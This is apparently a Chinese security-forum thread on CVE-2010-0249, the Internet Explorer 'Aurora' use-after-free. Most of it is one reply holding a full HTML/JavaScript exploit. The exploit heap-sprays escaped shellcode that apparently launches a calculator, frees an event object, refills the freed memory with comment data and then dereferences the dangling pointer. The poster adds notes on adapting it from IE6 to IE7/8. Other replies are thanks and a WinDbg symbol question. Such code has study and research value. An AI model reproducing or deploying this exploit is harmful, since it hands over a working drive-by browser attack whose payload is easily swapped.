[漏洞分析] CVE-2010-0249:(IE AURORA)

CVE-2010-0249: IE EVENTPARAM::EVENTPARAM构造错误导致UAF漏洞(IE AURORA)

CVE-2010-0249.rar (377.21 KB)

一下子扔这么多IE漏洞分析啊,我顶,哈哈


呵呵,对IE漏洞分析做过一些研究,以后还得向各位大牛多多学习。



有个疑问:mshtml库中的函数是怎么识别的?为什么我不能定位像 mshtml!CEventObj::CEventObj 这样的符号?

PS:Windows XP SP3 + IE6. windbg的搜索路径已经设置。


随手丢个质量不高的
  1. <html>
  2. <script>

  3. function heapspray()
  4. {
  5.         var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u646d%u2f20%u206b%u6163%u636c%u4100");
  6.         var nops = unescape("%u1414%u1414");
  7.         while(nops.length < 0x1000) nops += nops;
  8.        
  9.         var before=nops.substring(0, 0x5F4);
  10.         var end=before+shellcode+nops.substring(0, 0x800 - before.length - shellcode.length);
  11.         while(end.length<0x40000) end += end;
  12.        
  13.         var memory = new Array();
  14.         for(var i=0;i<1000;i++)
  15.         memory[i] = end.substring(0,end.length-0x3);
  16. }
  17. heapspray();
  18. //alert("Heap Spray Ok!");

  19. // Create ~ 200 comments using the randomly selected three character string AAA, will change data later in an attempt to overwrite
  20. var Array1 = new Array();
  21. for (i = 0; i < 200; i++)
  22. {
  23.   Array1[i] = document.createElement("COMMENT");
  24.   Array1[i].data = "AAA";
  25. }

  26. //alert("Create 200 comments ok!");

  27. var Element1 = null;

  28. // Function is called by the onload event of the IMG tag below
  29. // Creates and deletes object, calls the function to overwrite memory
  30. function FRemove(Value1)
  31. {  
  32.   heapspray();
  33.   Element1 = document.createEventObject(Value1); // Create the object of the IMG tag
  34.   document.getElementById("SpanID").innerHTML = ""; // Set parent object to null to trigger heap free()
  35.   window.setInterval(FOverwrite, 50); // Call the overwrite function every 50 ms
  36. }

  37. // Function attempts to overwrite heap memory of deleted object and then access object to trigger crash
  38. function FOverwrite()
  39. {
  40.        
  41.           buffer = unescape("%u1515%u1515");
  42.         /*
  43.         for(i=0;i<4;i++)
  44.         {
  45.                 buffer += unescape("%u1414%u1414");
  46.         }
  47. alert(buffer.length);
  48.         */
  49.         while(buffer.length<10)
  50.         {
  51.                 buffer += unescape("%u1010");
  52.         }
  53.         alert(buffer.length);
  54.   for (i = 0; i < Array1.length; i++)
  55.   {
  56.     Array1[i].data = buffer; // Set comment data to buffer, try to overwrite heap memory of deleted object
  57.   }
  58.   var a = Element1.srcElement; // Access the pointer to the deleted object, trigger crash
  59. }

  60. </script>

  61. <body>
  62. <span id="SpanID"><IMG src="./abcd.gif" onload="FRemove(event)" /></span></body></html>
  63. </body>
  64. </html>
此exp只适用于IE6;IE7/8请自行修改buffer长度。


真需要样本呢


学习了。
